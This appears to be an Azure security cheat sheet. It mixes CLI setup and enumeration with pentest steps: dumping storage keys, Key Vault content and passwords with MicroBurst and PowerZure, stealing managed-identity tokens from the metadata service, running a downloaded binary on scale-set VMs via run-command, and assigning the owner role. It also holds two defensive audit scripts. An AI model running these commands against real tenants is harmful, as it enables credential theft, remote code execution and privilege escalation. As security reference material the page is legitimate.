Getting Started

Install latest version of Azure CLI on Mac

brew update && brew install azure-cli

Resource: https://docs.microsoft.com/en-us/cli/azure/install-azure-cli-macos

Install latest version of Azure CLI on Linux

# YOLO
curl -sL https://aka.ms/InstallAzureCLIDeb | sudo bash

Resources: https://docs.microsoft.com/en-us/cli/azure/install-azure-cli-linux?pivots=apt https://docs.microsoft.com/en-us/powershell/azure/install-az-ps?view=azps-5.5.0

Install PowerShell

brew install --cask powershell-preview

Run a powershell terminal with:

pwsh-preview

Update Powershell

brew update
brew upgrade powershell-preview --cask

Uninstall Powershell

brew uninstall --cask powershell-preview
sudo rm -rf /usr/local/bin/pwsh-preview /usr/local/microsoft/powershell

Resource: https://docs.microsoft.com/en-us/powershell/scripting/install/installing-powershell-core-on-macos?view=powershell-7.1

Install Azure PowerShell module

For the current user:

if ($PSVersionTable.PSEdition -eq 'Desktop' -and (Get-Module -Name AzureRM -ListAvailable)) {
    Write-Warning -Message ('Az module not installed. Having both the AzureRM and ' +
      'Az modules installed at the same time is not supported.')
} else {
    Install-Module -Name Az -AllowClobber -Scope CurrentUser
}

Resource: https://docs.microsoft.com/en-us/powershell/azure/install-az-ps?view=azps-5.5.0

Setup the AzureRMAlias module

This will deal with incompatibilities with older scripts that use AzureRM:

Enable-AzureRmAlias

List available modules

Get-Module -ListAvailable

Get authenticated in Powershell

Connect-AzAccount

List commands in a module

Get-Command -Module <module name>

List functions in a module

Get-Command -Module <module name> -Type Function

Resource: https://stackoverflow.com/questions/6354317/how-do-i-retrieve-the-available-commands-from-a-module

Authenticate via the CLI

Run this command to get authenticated:

az login

This opens a web browser or prints a URL. Navigating to the URL prompts you for a code, which is shown in the command line. Paste it in, click next, and select the proper account.

Resource: https://docs.microsoft.com/en-us/cli/azure/install-azure-cli-macos

Info Gathering

List subscriptions for authenticated account

az account list

Get tenant id

az account list | jq '.[].tenantId'

Get subscription id

az cli:

az account list | jq '.[].id'

Powershell:

Get-AzSubscription

List tenants

az account tenant list

List Resource Groups by name

az group list | jq -r '.[].name'

Resource: https://docs.microsoft.com/en-us/cli/azure/group?view=azure-cli-latest

Set Subscription

az cli:

az account set -s <name or id>

Powershell:

Set-AzContext -Subscription [Subscription ID]

List all VMs

az vm list

Resource: https://docs.microsoft.com/en-us/cli/azure/vm?view=azure-cli-latest

Blob Storage

List all storage accounts and output in a table format:

az storage account list -o table

List all storage accounts and get storage account names:

az storage account list -o json | jq -r '.[].name'

You can assign one of the account names to an env var if you’d like:

export AZURE_STORAGE_ACCOUNT=<storage account name from output>

Get storage keys

If you set the env var:

az storage account keys list -n $AZURE_STORAGE_ACCOUNT

You can assign one of the keys to an env var if you’d like:

export AZURE_STORAGE_KEY='<your key from the output of the previous command>'

List storage containers

az storage container list --account-name $AZURE_STORAGE_ACCOUNT --account-key "$AZURE_STORAGE_KEY"

List storage container contents

az storage blob list --container-name <name of storage container from previous command> --account-name $AZURE_STORAGE_ACCOUNT --account-key $AZURE_STORAGE_KEY

Resource: https://www.secsignal.org/en/news/how-i-hacked-a-domain-controller-in-azure-during-a-penetration-test/

List blob names

az storage blob list --container-name <name of storage container from previous command> --account-name $AZURE_STORAGE_ACCOUNT --account-key $AZURE_STORAGE_KEY | jq '.[].name'
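
The key-based commands above only work while shared key authorization is enabled on the account. The following added example (not part of the original page) audits the JSON from `az storage account list -o json` for that and related settings; the sample records and the script name `audit_storage.py` are constructed for illustration.

```python
import json
import sys

# Constructed sample in the shape of `az storage account list -o json`
# (account names and settings are made up for this example).
SAMPLE = json.loads("""
[
  {"name": "examplelogs01", "allowSharedKeyAccess": null,
   "allowBlobPublicAccess": true, "minimumTlsVersion": "TLS1_0",
   "networkRuleSet": {"defaultAction": "Allow"}},
  {"name": "examplebackup02", "allowSharedKeyAccess": false,
   "allowBlobPublicAccess": false, "minimumTlsVersion": "TLS1_2",
   "networkRuleSet": {"defaultAction": "Deny"}}
]
""")


def audit_account(acct):
    """Return the list of findings for one storage account record."""
    findings = []
    # null/missing means the setting was never set, so key auth still works.
    if acct.get("allowSharedKeyAccess") is not False:
        findings.append("shared key authorization is not disabled")
    if acct.get("allowBlobPublicAccess") is not False:
        findings.append("anonymous blob access is not explicitly disabled")
    if acct.get("minimumTlsVersion") in (None, "TLS1_0", "TLS1_1"):
        findings.append("minimum TLS version is below 1.2 or unset")
    if (acct.get("networkRuleSet") or {}).get("defaultAction") != "Deny":
        findings.append("network default action is not Deny")
    return findings


def audit(accounts):
    """Map account name to findings, keeping only accounts that have any."""
    report = {}
    for acct in accounts:
        findings = audit_account(acct)
        if findings:
            report[acct.get("name", "<unnamed>")] = findings
    return report


if __name__ == "__main__":
    # Usage: az storage account list -o json > accounts.json
    #        python audit_storage.py accounts.json
    data = json.load(open(sys.argv[1])) if len(sys.argv) > 1 else SAMPLE
    for name, findings in audit(data).items():
        for finding in findings:
            print(f"{name}: {finding}")
```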

Azure Kubernetes (k8s)

Get available versions of k8s in a region

REGION=westus2 # This will vary depending on the region you're using
az aks get-versions --location $REGION -o table

Resource: https://gist.github.com/yokawasa/fd9d9b28f7c79461f60d86c23f615677#aks-cheat-sheet

List managed k8s clusters

az aks list

Resource: https://docs.microsoft.com/en-us/cli/azure/aks?view=azure-cli-latest

Get Resource Group Name for clusters

AZ_RESOURCE_GROUP_NAME=$(az aks list | jq -r '.[].resourceGroup')

Get Cluster Name

AZ_CLUSTER_NAME=$(az aks list | jq -r '.[].name')

Configure kubectl

This is pretty awesome, good job Microsoft:

az aks get-credentials --resource-group $AZ_RESOURCE_GROUP_NAME --name $AZ_CLUSTER_NAME

Security Auditing

ScoutSuite

https://github.com/nccgroup/ScoutSuite will generate an HTML report outlining various issues that exist in the configuration for a given account.

Install:

git clone git@github.com:nccgroup/ScoutSuite.git
cd ScoutSuite
pipenv --python 3
pipenv shell
pip install -r requirements.txt

Run:

python scout.py azure --cli

Resources: https://kalilinuxtutorials.com/scout-suite-multi-cloud-security-auditing-tool/

PowerZure

git clone git@github.com:hausec/PowerZure.git
cd PowerZure
pwsh-preview

# Authenticate
Connect-AzAccount

# Import PowerZure
# ipmo is shorthand for Import-Module
ipmo ./PowerZure.ps1

# If you have multiple subscriptions, set the one you want to target:
Set-AzureSubscription -Id [Subscription ID]

# Enumerate all roles
Get-AzureRole

# Enumerate resources the current user has access to
Get-AzureTargets

# Show info about current user
Show-AzureCurrentUser

Show all functions

powerzure -h

Get help for a particular function

For example:

get-help Get-AzureTargets

Get all content from all KeyVaults

Show-AzureKeyVaultContent -All

Create a new user

New-AzureUser -Username 'test@test.com' -Password reallyAwesomePassword123!

MicroBurst

git clone git@github.com:NetSPI/MicroBurst.git
cd MicroBurst

pwsh-preview

# Authenticate
Connect-AzAccount

# Import MicroBurst
ipmo ./MicroBurst.psm1

# Install module for Out-GridView
Install-Module Microsoft.PowerShell.GraphicalTools

# Show commands
Get-Command -Module MicroBurst

# Dump info from an Azure subscription
# Note: Be sure to click a row in the pop up before clicking Export
Get-AzDomainInfo -folder MicroBurst -Verbose

# Look for creds or certificate stores in a number of places and dump them to `secrets.txt`
# Note: Be sure to click a row in the pop up before clicking Export
Get-AzPasswords -Verbose | Out-File -FilePath ./secrets.txt

# Dump Key Vault Keys and Secrets from an Azure subscription
# via Automation Accounts specifically
# Note: Be sure to click a row in the pop up before clicking Export
Get-AzKeyVaultsAutomation -Verbose

SkyArk

git clone https://github.com/cyberark/SkyArk
cd SkyArk
pwsh-preview
Import-Module .\SkyArk.ps1 -force
Start-AzureStealth

Resource: https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Cloud%20-%20Azure%20Pentest.md

Azure AD

List all applications

az ad app list --output=table --query='[].{Name:displayName,URL:homepage}'

List all service principals

az ad sp list --output=table --query='[].{Name:displayName,Enabled:accountEnabled,URL:homepage,Publisher:publisherName,MetadataURL:samlMetadataUrl}'

List all groups

az ad group list --output=json --query='[].{Group:displayName,Description:description}'

Resource: https://www.blackhillsinfosec.com/red-teaming-microsoft-part-1-active-directory-leaks-via-azure/

VMSS

View all VMSS in a subscription

Simply navigate to this page and use the magical Try it button to use the REST API to grab this info. Neat!

CLI

az vmss list

Get VMSS by name and associated resource group

az vmss list | jq -r '.[] | "\(.name) \(.resourceGroup)"'

List vms in a VMSS

az vmss list-instances -n $VMSS_NAME -g $RESOURCE_GROUP

Resource: https://docs.microsoft.com/en-us/cli/azure/vmss?view=azure-cli-latest https://github.com/andyt530/az2tf/blob/master/scripts/295_azurerm_virtual_machine_scale_set.sh

Get computer name of vms in a VMSS

az vmss list-instances -n $VMSS_NAME -g $RESOURCE_GROUP | jq '.[].osProfile.computerName'

Run command in VM in a VMSS

This will run commands in the instance with an id of 0. See the above commands for how to get the id that corresponds to the instance you want to work with.

az vmss run-command invoke -g $RESOURCE_GROUP -n $VMSS_NAME --command-id RunShellScript --instance-id 0 --scripts 'echo $1 $2' --parameters hello world

Run whoami:

az vmss run-command invoke -g $RESOURCE_GROUP -n $VMSS_NAME --command-id RunShellScript --instance-id 0 --scripts 'whoami'

Download and run a binary as a background job:

az vmss run-command invoke -g $RESOURCE_GROUP -n $VMSS_NAME --command-id RunShellScript --instance-id 0 --scripts 'bash -c "cd /tmp && wget https://example.com/binary && chmod +x binary && ./binary &"'

Metadata Service

Get all instance metadata

curl -s -H Metadata:true --noproxy "*" "http://169.254.169.254/metadata/instance?api-version=2020-09-01"

Get access token

curl -s -H Metadata:true --noproxy "*" "http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.azure.com"

Request storage account token

# Get OAuth Token
TOKEN=$(curl -s "http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.azure.com" -H Metadata:true | jq -r '.access_token')

# Get subscription id
SUB=$(curl -s -H Metadata:true --noproxy "*" "http://169.254.169.254/metadata/instance?api-version=2020-09-01" | jq -r '.compute.subscriptionId')

# Get list of storage accounts
curl -s -H "Authorization: Bearer $TOKEN" -H Metadata:true "https://management.azure.com/subscriptions/$SUB/providers/Microsoft.Storage/storageAccounts?api-version=2021-06-01"

Get AKS node IP

curl -s -H Metadata:true "http://169.254.169.254/metadata/instance?api-version=2017-08-01" | jq -r '.network.interface[].ipv4.ipAddress[].privateIpAddress'

Resource: https://itnext.io/how-a-naughty-docker-image-on-aks-could-give-an-attacker-access-to-your-azure-subscription-6d05b92bf811

Roles

Create new role assignment

This will try to assign the assignee the owner role:

az role assignment create --assignee <user or service principal> --role "owner"

Resource: https://www.xmcyber.com/privilege-escalation-and-lateral-movement-on-azure-part-1/
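
Several commands on this page (storage key listing, `az aks get-credentials`, `az vmss run-command invoke`, role assignment creation) are control-plane calls that leave entries in the Azure Activity Log. The following added example (not part of the original page) triages an export in the shape of `az monitor activity-log list` output for those operations; the sample events, callers and resource ids are constructed, and the watch list is an assumption about which operation names matter.

```python
import json

# Suffixes of operationName.value (lower-cased) for control-plane calls made by
# commands on this page, with a label for the report.
WATCHED = {
    "microsoft.storage/storageaccounts/listkeys/action": "storage keys listed",
    "microsoft.authorization/roleassignments/write": "role assignment write",
    "managedclusters/listclusterusercredential/action": "AKS kubeconfig fetched",
    "runcommand/action": "Run Command invoked",
}

# Constructed events in the shape of `az monitor activity-log list` output;
# callers, timestamps and resource ids are made up.
SAMPLE = json.loads("""
[
  {"eventTimestamp": "2024-01-01T10:00:00Z", "caller": "alice@example.com",
   "operationName": {"value": "Microsoft.Storage/storageAccounts/listKeys/action"},
   "status": {"value": "Succeeded"}, "resourceId": "<storage account id>"},
  {"eventTimestamp": "2024-01-01T10:05:00Z", "caller": "alice@example.com",
   "operationName": {"value": "Microsoft.Compute/virtualMachineScaleSets/virtualMachines/runCommand/action"},
   "status": {"value": "Succeeded"}, "resourceId": "<vmss instance id>"},
  {"eventTimestamp": "2024-01-01T10:09:00Z", "caller": "alice@example.com",
   "operationName": {"value": "Microsoft.Authorization/roleAssignments/write"},
   "status": {"value": "Failed"}, "resourceId": "<role assignment id>"},
  {"eventTimestamp": "2024-01-01T09:00:00Z", "caller": "bob@example.com",
   "operationName": {"value": "Microsoft.Compute/virtualMachines/start/action"},
   "status": {"value": "Succeeded"}, "resourceId": "<vm id>"}
]
""")


def triage(events):
    """Return watched events as dicts, oldest first; failures are kept too."""
    hits = []
    for ev in events:
        op = ((ev.get("operationName") or {}).get("value") or "").lower()
        label = next((l for s, l in WATCHED.items() if op.endswith(s)), None)
        if label:
            hits.append({"time": ev.get("eventTimestamp") or "",
                         "caller": ev.get("caller"), "what": label,
                         "status": (ev.get("status") or {}).get("value"),
                         "resource": ev.get("resourceId")})
    return sorted(hits, key=lambda h: h["time"])


if __name__ == "__main__":
    for hit in triage(SAMPLE):
        print(hit["time"], hit["caller"], hit["what"], hit["status"], hit["resource"])
```

Failed attempts are kept in the output because a denied role assignment write is as much a signal as a successful one.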

Features

Show registered features in a table format

az feature list -o table

Find features associated w/ ContainerService

az feature list -o table --query "[?contains(name, 'Microsoft.ContainerService')].{Name:name,State:properties.state}"

Resource: https://heranonazure.wordpress.com/2019/09/02/secure-api-server-using-authorized-ip-address-ranges/